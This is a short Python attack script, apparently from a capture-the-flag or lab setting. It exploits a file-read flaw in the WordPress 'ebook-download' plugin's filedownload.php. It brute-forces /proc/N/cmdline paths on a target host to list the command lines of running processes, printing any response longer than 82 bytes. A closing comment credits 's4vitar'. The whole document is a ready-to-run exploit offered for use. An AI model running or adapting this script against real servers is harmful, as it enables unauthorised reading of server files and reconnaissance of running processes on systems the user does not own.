#!/usr/bin/python3

from pwn import *

import requests, signal, time, sys,pdb

def def_handler(sig, frame):

        print("\n\n[!] coming out...\n")
        sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://[ip]/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="

def makeRequest():
	p1 = log.progress("Brute force attack")
	p1.status("starting brute force attack")
	time.sleep(2)
	for i in range(1, 1000):

		p1.status("trying whith PATH /proc/%s/cmdline" % str(i))
		url = main_url + "/proc/" + str(i) + "/cmdline"
		r = requests.get(url)
		#pdb.set_trace() 
		if len(r.content) > 82:
			print("-------------------------------------------------------------------------")
			log.info("PATH: /proc/%s/cmdline" % str(i))
			log.info("total lengh: %s" % len(r.content))
			log.info(r.content)
			print("-------------------------------------------------------------------------")
		


#		print(len(r.content))
if __name__ == '__main__':
        makeRequest()
# codigo s4vitar
